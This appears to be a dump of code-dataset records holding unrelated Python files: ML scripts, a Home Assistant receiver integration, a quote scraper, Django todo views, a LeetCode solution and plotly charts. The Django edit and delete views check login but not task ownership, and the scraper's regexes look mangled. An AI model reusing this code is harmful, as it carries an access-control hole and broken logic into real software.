metrics=['accuracy'])\n\nmodel.summary()\nmodel.fit(train_data, train['target'], validation_split=0.25, epochs=5)\nmodel_loss = pd.DataFrame(model.history.history)\nmodel_loss[['accuracy','val_accuracy']].plot()\n\npredictions= model.predict_classes(test_data)\n\n#print(predictions)\n\nsubmission = pd.read_csv('sample_submission.csv')\nsubmission[\"target\"] = predictions\nsubmission.to_csv(\"submission_glove.csv\", index=False)\n","sub_path":"keras.py","file_name":"keras.py","file_ext":"py","file_size_in_byte":6512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"502613204","text":"\n\n\nimport os\n\nfrom distancerasters import build_distance_array, rasterize, export_raster\n\n\n# -----------------------------------------------------------------------------\n\nfrom affine import Affine\n# import numpy as np\nimport fiona\n\npixel_size = 0.0002695\n\ncanal_path = os.path.expanduser(\n \"~/git/afghanistan_gie/canal_data/canal_lines.geojson\")\n\nwith fiona.open(canal_path) as canal_src:\n bounds = canal_src.bounds\n\n\nrv_array, affine = rasterize(canal_path, pixel_size=pixel_size, bounds=bounds)\n\n\nbinary_raster_path = 
\"/sciclone/aiddata10/REU/data/projects/afghanistan_gie/distance_to_canals/binary_canals.tif\"\n\nexport_raster(rv_array, affine, binary_raster_path)\n\n# import tarfile\n\n# def make_tarfile(dst, src):\n# with tarfile.open(dst, \"w:gz\") as tar:\n# tar.add(src, arcname=os.path.basename(src))\n\n\n# make_tarfile(dst=binary_raster_path + \".tar.gz\" , src=binary_raster_path)\n\n# -----------------------------------------------------------------------------\n\n\ndistance_raster_path = \"/sciclone/aiddata10/REU/data/projects/afghanistan_gie/distance_to_canals/distance_canals.tif\"\n\ndef raster_conditional(rarray):\n return (rarray == 1)\n\ndist = build_distance_array(rv_array, affine=affine,\n output=distance_raster_path,\n conditional=raster_conditional)\n\n\n# make_tarfile(dst=distance_raster_path + \".tar.gz\" , src=distance_raster_path)\n\n","sub_path":"distance_to_canals/build_dist_raster.py","file_name":"build_dist_raster.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"552178425","text":"from httplib import OK\n\nfrom flask import url_for\n\nfrom . import utils\n\n\ndef test_index(client):\n \"\"\"Test the response of the index route.\n\n :type client flask.testing.FlaskClient\n \"\"\"\n resp = client.get(url_for('index'))\n assert resp.status_code == OK\n soup = utils.get_soup(resp.data)\n assert utils.get_content_by_css(soup, 'head > title') == 'Home - microblog'\n assert utils.get_content_by_css(soup, 'body > h1') == 'Hi, Miguel!'\n assert len(soup.find_all('p')) == 2\n","sub_path":"tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"154988990","text":"\"\"\"Support for Pioneer Network Receivers.\"\"\"\r\nimport logging\r\nimport asyncio\r\nimport time\r\n\r\nimport voluptuous as vol\r\n\r\nfrom homeassistant.const import (\r\n ATTR_ENTITY_ID, CONF_HOST, CONF_NAME, CONF_PORT, STATE_OFF, STATE_ON,\r\n EVENT_HOMEASSISTANT_STOP\r\n)\r\n\r\n\r\nfrom homeassistant.components.media_player import MediaPlayerEntity, PLATFORM_SCHEMA\r\nfrom homeassistant.components.media_player.const import (\r\n SUPPORT_SELECT_SOURCE,\r\n SUPPORT_TURN_OFF,\r\n SUPPORT_TURN_ON,\r\n SUPPORT_VOLUME_MUTE,\r\n SUPPORT_VOLUME_SET,\r\n SUPPORT_VOLUME_STEP\r\n\r\n)\r\nfrom homeassistant.const import (\r\n CONF_HOST,\r\n CONF_NAME,\r\n CONF_PORT,\r\n CONF_TIMEOUT,\r\n STATE_OFF,\r\n STATE_ON,\r\n)\r\nimport homeassistant.helpers.config_validation as cv\r\n\r\n_LOGGER = logging.getLogger(__name__)\r\n\r\nCONF_SOURCES = \"sources\"\r\n\r\nDEFAULT_NAME = \"Pioneer AVR\"\r\nDEFAULT_PORT = 8102 # telnet default. 
Some Pioneer AVRs use 8102\r\nDEFAULT_TIMEOUT = None\r\nDEFAULT_SOURCES = {}\r\n\r\nDATA_PIONEER = 'pioneer'\r\n\r\nSUPPORT_PIONEER = (\r\n SUPPORT_VOLUME_SET\r\n | SUPPORT_VOLUME_MUTE\r\n | SUPPORT_TURN_ON\r\n | SUPPORT_TURN_OFF\r\n | SUPPORT_SELECT_SOURCE\r\n | SUPPORT_VOLUME_STEP\r\n)\r\n\r\n#MAX_VOLUME = 150\r\nMAX_VOLUME = 100\r\nMAX_SOURCE_NUMBERS = 60\r\n\r\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(\r\n {\r\n vol.Required(CONF_HOST): cv.string,\r\n vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,\r\n vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,\r\n vol.Optional(CONF_TIMEOUT, default=DEFAULT_TIMEOUT): cv.socket_timeout,\r\n vol.Optional(CONF_SOURCES, default=DEFAULT_SOURCES): {cv.string: cv.string},\r\n }\r\n)\r\n\r\n\r\nasync def async_setup_platform(hass, config, async_add_entities, discovery_info=None):\r\n \"\"\"Set up the Pioneer platform.\"\"\"\r\n pioneer = PioneerDevice(\r\n hass,\r\n config[CONF_NAME],\r\n config[CONF_HOST],\r\n config[CONF_PORT],\r\n config[CONF_TIMEOUT],\r\n config[CONF_SOURCES],\r\n )\r\n\r\n hass.loop.create_task(pioneer.readdata())\r\n\r\n if DATA_PIONEER not in hass.data:\r\n hass.data[DATA_PIONEER] = []\r\n hass.data[DATA_PIONEER].append(pioneer)\r\n\r\n _LOGGER.debug(\"adding pio entity\")\r\n async_add_entities([pioneer], update_before_add=False)\r\n\r\n\r\n\r\nclass PioneerDevice(MediaPlayerEntity):\r\n \"\"\"Representation of a Pioneer device.\"\"\"\r\n\r\n def __init__(self, hass, name, host, port, timeout, sources):\r\n \"\"\"Initialize the Pioneer device.\"\"\"\r\n self._name = name\r\n self._host = host\r\n self._port = port\r\n self._timeout = timeout\r\n self._volume = 0\r\n self._muted = False\r\n self._selected_source = \"\"\r\n self._source_name_to_number = sources\r\n self._source_number_to_name = dict((v, k) for k, v in sources.items())\r\n \r\n self._volume = None\r\n self._muted = False\r\n self._power = False\r\n\r\n self._async_added = False\r\n self._stop_listen = False\r\n self.hasConnection = False\r\n self.reader = None\r\n self.writer = None\r\n\r\n hass.bus.async_listen(EVENT_HOMEASSISTANT_STOP, self.stop_pioneer)\r\n\r\n def stop_pioneer(self, event):\r\n _LOGGER.info(\"Shutting down Pioneer\")\r\n self._stop_listen = True\r\n\r\n\r\n async def async_added_to_hass(self):\r\n _LOGGER.debug(\"Async async_added_to_hass\")\r\n self._async_added = True\r\n\r\n async def readdata(self):\r\n _LOGGER.debug(\"Readdata\")\r\n\r\n while not self._stop_listen:\r\n if not self.hasConnection:\r\n try:\r\n self.reader, self.writer = \\\r\n await asyncio.open_connection(self._host, self._port)\r\n self.hasConnection = True\r\n _LOGGER.info(\"Connected to %s:%d\", self._host, self._port)\r\n except Exception:\r\n _LOGGER.error(\"No connection to %s:%d, retry in 30s\", \\\r\n self._host, self._port)\r\n await asyncio.sleep(30)\r\n continue\r\n\r\n try:\r\n data = await self.reader.readuntil(b'\\n')\r\n except Exception:\r\n self.hasConnection = False\r\n _LOGGER.error(\"Lost connection!\")\r\n continue\r\n\r\n if not data.decode().strip():\r\n await asyncio.sleep(1)\r\n _LOGGER.debug(\"none read\")\r\n continue\r\n self.parseData(data.decode())\r\n\r\n _LOGGER.debug(\"Finished Readdata\")\r\n return True\r\n\r\n def parseData(self, data):\r\n msg = \"\"\r\n _LOGGER.debug(\"Parse data\") \r\n _LOGGER.debug(data)\r\n # Selected input source\r\n if data[:2] == \"FN\":\r\n source_number = data[2:4]\r\n _LOGGER.debug(source_number)\r\n _LOGGER.debug(self._source_number_to_name)\r\n\r\n if source_number:\r\n self._selected_source = 
self._source_number_to_name.get(source_number)\r\n _LOGGER.debug(self._selected_source)\r\n else:\r\n self._selected_source = None\r\n\r\n # Power state\r\n elif data[:3] == \"PWR\":\r\n if (data[3] == \"1\") or (data[3] == \"2\"): # VSX-529 uses \"2\" for State off\r\n self._power = False\r\n else:\r\n self._power = True\r\n\r\n \r\n # Is muted\r\n elif data[:3] == \"MUT\":\r\n if data[3] == \"1\":\r\n self._muted = False\r\n else:\r\n self._muted = True\r\n\r\n\r\n # Volume level\r\n elif data[:3] == \"VOL\":\r\n self._volume = int(data[3:6]) / MAX_VOLUME\r\n _LOGGER.debug(\"Volume: \" + str(round(self._volume*100))+\"%\")\r\n\r\n\r\n else:\r\n print (data)\r\n\r\n if self._async_added:\r\n self.async_schedule_update_ha_state()\r\n\r\n return msg\r\n\r\n\r\n\r\n def telnet_command(self, command):\r\n _LOGGER.debug(\"Command: \" + command)\r\n\r\n if self.hasConnection:\r\n if not self.writer:\r\n _LOGGER.error(\"No writer available\")\r\n self.hasConnection = False\r\n return\r\n\r\n try:\r\n self.writer.write(command.encode(\"ASCII\") + b\"\\r\")\r\n except (ConnectionRefusedError, OSError):\r\n _LOGGER.error(\"Pioneer %s refused connection!\", self._name)\r\n self.hasConnection = False\r\n return\r\n except:\r\n _LOGGER.error(\"Pioneer %s lost connection!\", self._name)\r\n self.hasConnection = False\r\n return\r\n\r\n\r\n\r\n async def async_update(self):\r\n \"\"\"Get the latest details from the device.\"\"\"\r\n _LOGGER.debug(\"Update\")\r\n\r\n self.telnet_command(\"?P\") # Power state?\r\n\r\n if self._power:\r\n self.telnet_command(\"?V\") # Volume?\r\n self.telnet_command(\"?M\") # Muted?\r\n self.telnet_command(\"?F\") # Input source?\r\n return True\r\n\r\n @property\r\n def name(self):\r\n \"\"\"Return the name of the device.\"\"\"\r\n return self._name\r\n \r\n @property\r\n def state(self):\r\n \"\"\"Return the state of the device.\"\"\"\r\n if self._power:\r\n return STATE_ON\r\n return STATE_OFF\r\n\r\n @property\r\n def volume_level(self):\r\n \"\"\"Volume level of the media player (0..1).\"\"\"\r\n return self._volume\r\n\r\n @property\r\n def is_volume_muted(self):\r\n \"\"\"Boolean if volume is currently muted.\"\"\"\r\n return self._muted\r\n\r\n @property\r\n def supported_features(self):\r\n \"\"\"Flag media player features that are supported.\"\"\"\r\n return SUPPORT_PIONEER\r\n\r\n @property\r\n def source(self):\r\n \"\"\"Return the current input source.\"\"\"\r\n return self._selected_source\r\n\r\n @property\r\n def source_list(self):\r\n \"\"\"List of available input sources.\"\"\"\r\n return list(self._source_name_to_number.keys())\r\n\r\n def turn_off(self):\r\n \"\"\"Turn off media player.\"\"\"\r\n self.telnet_command(\"PF\")\r\n\r\n def volume_up(self):\r\n \"\"\"Volume up media player.\"\"\"\r\n self.telnet_command(\"VU\")\r\n\r\n def volume_down(self):\r\n \"\"\"Volume down media player.\"\"\"\r\n self.telnet_command(\"VD\")\r\n\r\n def set_volume_level(self, volume):\r\n \"\"\"Set volume level, range 0..1.\"\"\"\r\n # 60dB max\r\n# while (self._volume != volume)\r\n _LOGGER.warning(\"Self: %f %f %d\", self._volume, volume, (self._volume - volume)* MAX_VOLUME/2)\r\n \r\n for x in range(abs(round((self._volume - volume)* MAX_VOLUME/2))):\r\n if ((self._volume - volume)< 0):\r\n self.volume_up()\r\n if ((self._volume - volume)> 0):\r\n self.volume_down()\r\n time.sleep(.100)\r\n\r\n\r\n def mute_volume(self, mute):\r\n \"\"\"Mute (true) or unmute (false) media player.\"\"\"\r\n self.telnet_command(\"MO\" if mute else \"MF\")\r\n\r\n def 
turn_on(self):\r\n \"\"\"Turn the media player on.\"\"\"\r\n self.telnet_command(\"PO\")\r\n\r\n def select_source(self, source):\r\n \"\"\"Select input source.\"\"\"\r\n self.telnet_command(self._source_name_to_number.get(source) + \"FN\")\r\n","sub_path":"media_player.py","file_name":"media_player.py","file_ext":"py","file_size_in_byte":9177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"241428079","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom core.spyce_core import *\n\n\ndef xpp_twobody_nopert(spycore_obj, t, vstate):\n \n if(len(vstate) -1)\r\n\r\n\r\ndef log_error(e):\r\n \"\"\"\r\n It is always a good idea to log errors.\r\n This function just prints them, but you can\r\n make it do anything.\r\n \"\"\"\r\n print(e)\r\n\r\n\r\ndef write_to_txt(url):\r\n quotes = []\r\n raw_html = simple_get(url)\r\n regex1 = re.compile(\r\n '^
[\\s]*([\\w\\W][\\d\\D]*)[\\s]*[\\s]*([\\w\\W][\\d\\D]*)?<\\/span>[\\s\\S]([\\s\\S][\\w\\W][\\d\\D]*)<\\/a>[\\s\\S]<\\/span>')\r\n regex2 = re.compile(\r\n '^
([\\s\\S][\\w\\W][\\d\\D]*)([\\s\\S][\\w\\W][\\d\\D]*)?<\\/span>')\r\n\r\n for quote in raw_html.find_all('div', {\"class\": \"quoteText\"}):\r\n q = str(quote)\r\n r1 = regex1.match(q)\r\n r2 = regex2.match(q)\r\n fixed = \"\"\r\n if(r1):\r\n fixed = fix_string(r1)\r\n elif(r2):\r\n fixed = fix_string(r2)\r\n\r\n fixed = remove_format(fixed)\r\n fixed = fixed + \" #quote\"\r\n if(fixed != \"\"):\r\n quotes.append(fixed)\r\n\r\n return quotes\r\n\r\n\r\ndef fix_string(str):\r\n new_str = \"\"\r\n for group in str.groups():\r\n group.strip()\r\n new_str += \" \" + group.strip()\r\n\r\n return new_str.replace(\"
―\", \"― \")\r\n\r\ndef remove_format(str):\r\n\tfixed = str.replace(\"
\", \"\\n\")\r\n\tfixed = fixed.replace(\"\" , \"\")\r\n\tfixed = fixed.replace(\"\" , \"\")\r\n\tfixed = fixed.replace(\"\" , \"\")\r\n\tfixed = fixed.replace(\"\" , \"\")\r\n\tfixed = fixed.replace(\"\" , \"\")\r\n\tfixed = fixed.replace(\"\" , \"\")\r\n\tfixed = fixed.replace(\"&\" , \"&\")\r\n\treturn fixed\r\n","sub_path":"quotes.py","file_name":"quotes.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"173246555","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.models import User\nfrom django.http.response import HttpResponseRedirect\n\nfrom django.shortcuts import redirect, render, get_object_or_404\n\nfrom todo.models import Task\n\nfrom django.urls import reverse\n\nfrom todo.forms import RegistrationForm, LoginForm, TaskForm, EditForm\n\nfrom django.contrib import messages\n\n# Create your views here.\n\ndef index(request):\n if request.user.is_authenticated:\n return redirect(reverse('todo:user_page', args=(request.user.id,)))\n \n tasks = None\n obj_list = None\n \n user = request.user\n task_form = TaskForm()\n if request.method == 'POST':\n try:\n\n title = request.POST['text']\n date = request.POST['date']\n email = request.POST['email']\n print(date)\n task_obj = Task(title=title, when_to_do=date, email=email)\n for task in Task.objects.all():\n if title == task.title and (email == task.email or task.email == '' or task.email == None):\n return redirect(reverse('todo:index'))\n task_obj.save()\n except:\n messages.error(request, f\"There was error in submitting your task, enter date field.\")\n return redirect(reverse('todo:index'))\n else:\n # check if this data already exist for this email\n \n tasks = Task.objects.all().filter(email=email)[::-1]\n obj_list = tasks[:5]\n\n return render(request, 'todo/index.html', {\n 'tasks':obj_list,\n 'task_form':task_form,\n })\n\ndef login_page(request):\n if request.user.is_authenticated:\n return redirect(reverse('todo:index'))\n \n login_form = LoginForm()\n if request.method == 'POST':\n try:\n login_form = RegistrationForm(request.POST)\n\n username = request.POST['username']\n password = request.POST['password']\n \n user = authenticate(request, username=username, password=password)\n \n print(user.id)\n if user is not None:\n login(request, user)\n\n \n except:\n messages.info(request, f\"Please fill the form\")\n return HttpResponseRedirect(reverse('todo:login_page'))\n else:\n \n #get user from User model \n user_obj = User.objects.get(username=user.id)\n\n all_task = Task.objects.all()\n for task in all_task:\n if task.user_id == None and task.email == user_obj.email:\n \n task_object = Task.objects.get(pk=task.id)\n task_object.user_id = user_obj.id\n task_object.save()\n return HttpResponseRedirect(reverse('todo:user_page', args=(user_obj.id,)))\n\n return render(request, 'todo/login.html', {\n 'login_form':login_form,\n })\n\n\ndef register_page(request):\n if request.user.is_authenticated:\n return redirect(reverse('todo:index'))\n register_form = RegistrationForm()\n\n if request.method == \"POST\":\n register_form = RegistrationForm(request.POST)\n\n if register_form.is_valid():\n register_form.save()\n# This should be ran by a signal\n username = register_form.cleaned_data['username']\n\n email = register_form.cleaned_data['email']\n # Get user records with the register email and username\n # fetch all task, loop through task to find if this user has a user_id == None with 
this email.\n # get task user_id and bind with this reg. user id\n # !!!! important: when updating a model object always use the .save() with the record_object itself.\n this_user = User.objects.get(username=username, email=email)\n\n all_task = Task.objects.all()\n \n for task in all_task:\n if task.user_id == None and task.email == this_user.email:\n # print(task.id, task.user_id, this_user.id)\n \n task_object = Task.objects.get(pk=task.id)\n # print(task_object)\n task_object.user_id = this_user.id\n task_object.save()\n messages.success(request, f\"Successfully created {username}, Enter credentals to Login.\")\n messages.success(request, f\"Successfully created {username}, Enter credentals to Login.\") \n return redirect(reverse('todo:login_page'))\n \n return render(request, 'todo/register.html', {\n\n 'register_form':register_form,\n\n })\n\n\ndef user_page(request, pk):\n if not request.user.is_authenticated:\n return redirect(reverse('todo:login_page'))\n user_obj = get_object_or_404(User, pk=pk)\n\n if request.method == \"POST\":\n\n try:\n title = request.POST['text']\n date = request.POST['date']\n email = user_obj.email\n\n obj = Task(user=request.user, title=title, when_to_do=date, email=email)\n obj.save()\n except:\n messages.info(request, f\"Please fill the fields\")\n return redirect(reverse('todo:user_page', args=(pk,)))\n else:\n return redirect(reverse('todo:user_page', args=(pk,)))\n\n\n task = user_obj.task_set.all().order_by('-created')\n return render(request, 'todo/user_page.html', {\n 'user_obj':user_obj,\n 'tasks':task,\n })\n\ndef edit(request, pk):\n if not request.user.is_authenticated:\n return redirect(reverse('todo:login_page'))\n task = get_object_or_404(Task, pk=pk)\n edit_form = EditForm(instance=task)\n\n if request.method == 'POST':\n edit_form = EditForm(request.POST, instance=task)\n\n if edit_form.is_valid():\n edit_form.save()\n\n return HttpResponseRedirect(reverse('todo:user_page', args=(request.user.id, )))\n return render(request, 'todo/edit.html', {\n 'form': edit_form,\n 'task':task,\n })\n\ndef delete(request, pk):\n if not request.user.is_authenticated:\n return redirect(reverse('todo:login_page'))\n\n task = get_object_or_404(Task, pk=pk)\n if request.method == 'POST':\n task.delete()\n return redirect(reverse('todo:user_page', args=(request.user.id,)))\n return render(request, 'todo/delete.html', {\n 'task':task,\n })\n\ndef logout_handler(request):\n logout(request)\n return redirect(reverse('todo:index'))","sub_path":"todo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"70623395","text":"class Solution(object):\n def intersect(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: List[int]\n \"\"\"\n if len(nums2) < len(nums1):\n nums1, nums2 = nums2, nums1\n res = []\n for n in nums1:\n if n in nums2:\n res.append(n)\n nums2.remove(n)\n return res","sub_path":"LeetCode/Algorithm/Python/350-Intersection of Two Arrays II.py","file_name":"350-Intersection of Two Arrays II.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"448161371","text":"\"\"\"Compute the contact forces required for static equilibrium of an assembly.\n\n1. Make an Xfunc of ``compute_interface_forces``\n2. Load an assembly from a JSON file.\n3. Make a sub-assembly corresponding to the building sequence.\n4. 
Check if the sub-assembly is properly supported.\n5. Compute interface forces.\n6. Visualise in Rhino.\n\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\n\nimport compas\n\nfrom compas_rhino.utilities import XFunc\nfrom compas_assembly.datastructures import Assembly\n\n\n# make an XFunc version of the compute interfaces function\n\ncompute_interface_forces_xfunc = XFunc('compas_rbe.equilibrium.compute_interface_forces_xfunc')\n\n# path to CPython on RhinoMac\n# change this if necessary\n\nif compas.is_mono():\n    python = os.path.join(os.environ['HOME'], 'anaconda3/bin/python')\n    compute_interface_forces_xfunc.python = python\n\n# a convenience wrapper\n\ndef compute_interface_forces(assembly, **kwargs):\n    data = {\n        'assembly': assembly.to_data(),\n        'blocks': {str(key): assembly.blocks[key].to_data() for key in assembly.blocks},\n    }\n    result = compute_interface_forces_xfunc(data, **kwargs)\n    assembly.data = result['assembly']\n    for key in assembly.blocks:\n        assembly.blocks[key].data = result['blocks'][str(key)]\n\n# just so Rhino(Mac) gets the filepaths right\n\nHERE = os.path.dirname(__file__)\n\n# load an assembly from a JSON file\n\nassembly = Assembly.from_json(os.path.join(HERE, '../data/wall_courses.json'))\n\n# define a sequence of buildable blocks\n\nsequence = [28, 22, 23, 16, 17, 18, 11, 12, 13, 5, 6, 7, 8, 0, 1, 2, 3, 38]\n\n# create a sub_assembly for the sequence\n\nsub = assembly.subset(sequence)\n\n# check if the sub_assembly is supported\n\nsupports = list(sub.vertices_where({'is_support': True}))\n\nif not supports:\n    raise Exception('The sub-assembly has no supports.')\n\n# compute the interface forces\n\ncompute_interface_forces(sub, solver='CPLEX', verbose=True)\n\n# update the original assembly\n\nfor u, v, attr in assembly.edges(True):\n    if sub.has_edge(u, v):\n        attr['interface_forces'] = sub.get_edge_attribute((u, v), 'interface_forces')\n    else:\n        attr['interface_forces'] = None\n\n# visualise the result\n\nassembly.draw({\n    'layer': 'Assembly',\n    'show.vertices': True,\n    'show.interfaces': True,\n    'show.forces': True,\n    'show.forces_as_vectors': False,\n    'mode.interface': 0,\n    'scale.force': 1.0\n})\n","sub_path":"examples/wall_sequence_equilibrium_rhino.py","file_name":"wall_sequence_equilibrium_rhino.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} {"seq_id":"618133731","text":"\"\"\"\n\nYou have three arrays.\nMerge the first two based on positions from corresponding items in the 3rd array.\nNegative items in the 3rd array mean we don't want the corresponding item from the 2nd array in the merged array.\n\nStory - You generate a set of Ads and a set of Web results. Web results are already ordered.\nYou want to optimally insert ads on the page. You run a model, and for each item in the Ads array the model predicts where it should go in the resulting array.\n\n\nExample:\n\na1: 10 11 12 13\na2: 01 02 03 04\na3: 01 -1 -1 03\n\nres: 10 01 11 12 04 13\n\"\"\"\n\ndef solve(a1, a2, a3):\n    #few assumptions. 
Since this is Ads and Ads generate revenue - we must try hard to build resulting page\n dict={}\n\n if (a2 == None or a3 == None):\n return a1\n #this will set default values for dict\n for i in range(min(len(a2),len(a3))):\n if a3[i]>=0:\n dict[a3[i]]=a2[i]\n\n d = sorted(dict.items())\n\n i = 0\n j = 0\n k=0\n result = []\n\n while i < len(a1) and j< len(d):\n if d[j][0] == k:\n result.append(d[j][1])\n j+=1\n else:\n result.append(a1[i])\n i+=1\n k+=1\n\n while j < len(d):\n result.append(d[j][1])\n j+=1\n\n while i < len(a1):\n result.append(a1[i])\n i+=1\n\n print(result)\n return result\n\ndef solve_acceptable(a1, a2,a3):\n if (a2 == None or a3 == None):\n return a1\n\n dict={}\n for i in range(min(len(a2),len(a3))):\n if a3[i]>=0:\n dict[a3[i]]=a2[i]\n result = a1.copy() if a1 != None else []\n for d in sorted(dict.items()):\n result.insert(d[0],d[1])\n return result\n\nsolve_acceptable([10, 11, 12, 13],[1, 2, 3, 4],[1, -1, -1, 100])","sub_path":"archive/p_21.py","file_name":"p_21.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"200886548","text":"'''\nCreated on April 27, 2015\n@author: Prajit Kumar Das\nUsage: python plotResults.py username apiKey\n'''\n\nimport sys\nimport time\nimport databaseHandler\nimport plotly.tools as tls\n# Learn about API authentication here: https://plot.ly/python/getting-started\n# Find your apiKey here: https://plot.ly/settings/api\nimport plotly.plotly as py\nfrom plotly.graph_objs import *\nimport json\nimport gzip\nimport logging\nlogging.basicConfig(filename='syscall.log',level=logging.DEBUG)\n\n# This is a plot for Permissions count vs Frequency of apps requesting that many permissions\ndef generateAppPermissionsRequestedFrequencyHistogram(username, apiKey):\n\tpermCountDict = extractAppPermData()\n\tpermCount = []\n\tpermCountFreq = []\n\tfor permissionCount, permissionCountFreq in permCountDict.iteritems():\n\t\tpermCount.append(permissionCount)\n\t\tpermCountFreq.append(permissionCountFreq)\n\n\ttls.set_credentials_file(username, apiKey)\n\ttrace = Bar(\n\t\tx=permCount,\n\t\ty=permCountFreq,\n\t\tname='App frequency',\n\t\tmarker=Marker(\n\t\t\tcolor='rgb(55, 83, 109)'\n\t\t)\n\t)\n\tdata = Data([trace])\n\tlayout = Layout(\n\t\ttitle='App Frequency vs Number of Permissions requested',\n\t\txaxis=XAxis(\n\t\t\ttitle='Number of Permissions requested',\n\t\t\ttitlefont=Font(\n\t\t\t\tsize=16,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t),\n\t\t\ttickfont=Font(\n\t\t\t\tsize=14,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t)\n\t\t),\n\t\tyaxis=YAxis(\n\t\t\ttitle='App frequency',\n\t\t\ttitlefont=Font(\n\t\t\t\tsize=16,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t),\n\t\t\ttickfont=Font(\n\t\t\t\tsize=14,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t)\n\t\t),\n\t\tlegend=Legend(\n\t\t\tx=0,\n\t\t\ty=1.0,\n\t\t\tbgcolor='rgba(255, 255, 255, 0)',\n\t\t\tbordercolor='rgba(255, 255, 255, 0)'\n\t\t),\n\t\tbarmode='group',\n\t\tbargap=0.15,\n\t\tbargroupgap=0.1\n\t)\n\tfig = Figure(data=data, layout=layout)\n\tplot_url = py.plot(fig, filename='app-perm')\n\tlogging.debug('Check out the URL: '+plot_url+' for your plot')\n \ndef extractAppPermData():\n\tdbHandle = databaseHandler.dbConnectionCheck() #DB Open\n\n\tcursor = dbHandle.cursor()\n\tsqlStatement = \"SELECT * FROM `app_perm_count_view`;\"\n\ttry:\n\t\tcursor.execute(sqlStatement)\n\t\tif cursor.rowcount > 0:\n\t\t\tqueryOutput = cursor.fetchall()\n\t\t\tpermCountDict = {}\n\t\t\tfor row in 
queryOutput:\n\t\t\t\tpermissionCount = row[1]\n\t\t\t\tif permCountDict.has_key(permissionCount):\n\t\t\t\t\tcurrentValue = permCountDict[permissionCount]\n\t\t\t\t\tpermCountDict[permissionCount] = currentValue + 1\n\t\t\t\telse:\n\t\t\t\t\tpermCountDict[permissionCount] = 1\n\texcept:\n\t\tlogging.debug('Unexpected error: ' + str(sys.exc_info()[0]))\n\t\traise\n\n\tdbHandle.close() #DB Close\n\t\n\treturn permCountDict\n\t\n# This is a plot for Permissions count vs Frequency of apps requesting that many permissions\ndef generatePermissionsRequestedByAppFrequencyHistogram(username, apiKey):\n\tdbHandle = databaseHandler.dbConnectionCheck() #DB Open\n\n#\t crawlUrl(dbHandle, \"https://raw.githubusercontent.com/android/platform_frameworks_base/master/core/res/AndroidManifest.xml\")\t\n#\t sys.exit(1)\n\n\tcursor = dbHandle.cursor()\n\tsqlStatement = \"SELECT * FROM `perm_app_count_view` LIMIT 25;\"\n\ttry:\n\t\tcursor.execute(sqlStatement)\n\t\tif cursor.rowcount > 0:\n\t\t\tqueryOutput = cursor.fetchall()\n\t\t\tappCount = []\n\t\t\tpermName = []\n\t\t\tfor row in queryOutput:\n\t\t\t\tappCount.append(row[0])\n\t\t\t\tpermName.append(row[1])\n\texcept:\n\t\tlogging.debug('Unexpected error: ' + str(sys.exc_info()[0]))\n\t\traise\n\n\tdbHandle.close() #DB Close\n\n\ttls.set_credentials_file(username, apiKey)\n\ttracePerm = Bar(\n\t\tx=permName,\n\t\ty=appCount,\n\t\tname='App frequency count',\n\t\tmarker=Marker(\n\t\t\tcolor='rgb(55, 83, 100)'\n\t\t)\n\t)\n\tdata = Data([tracePerm])\n\tlayout = Layout(\n\t\ttitle='Permission vs App frequency count',\n\t\txaxis=XAxis(\n\t\t\ttitle='Permission',\n\t\t\ttitlefont=Font(\n\t\t\t\tsize=16,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t),\n\t\t\ttickfont=Font(\n\t\t\t\tsize=14,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t)\n\t\t),\n\t\tyaxis=YAxis(\n\t\t\ttitle='App frequency',\n\t\t\ttitlefont=Font(\n\t\t\t\tsize=16,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t),\n\t\t\ttickfont=Font(\n\t\t\t\tsize=14,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t)\n\t\t),\n\t\tlegend=Legend(\n\t\t\tx=0,\n\t\t\ty=1.0,\n\t\t\tbgcolor='rgba(255, 255, 255, 0)',\n\t\t\tbordercolor='rgba(255, 255, 255, 0)'\n\t\t),\n\t\tbarmode='group',\n\t\tbargap=0.15,\n\t\tbargroupgap=0.1\n\t)\n\tfig = Figure(data=data, layout=layout)\n\tplot_url = py.plot(fig, filename='perm-app')\n\tlogging.debug('Check out the URL: '+plot_url+' for your plot')\n\n# This is a plot for Goodness of Cluster measure using homogeneity_score, completeness_score\ndef generateGroundTruthResults(username, apiKey, clusterCountList, homogeneityScoreList, completenessScoreList, adjustedRandScoreList, adjustedMutualInfoScoreList, vMeasureScoreList, normalizedMutualInfoScore, postfix):\n\ttls.set_credentials_file(username, apiKey)\n\ttrace0 = 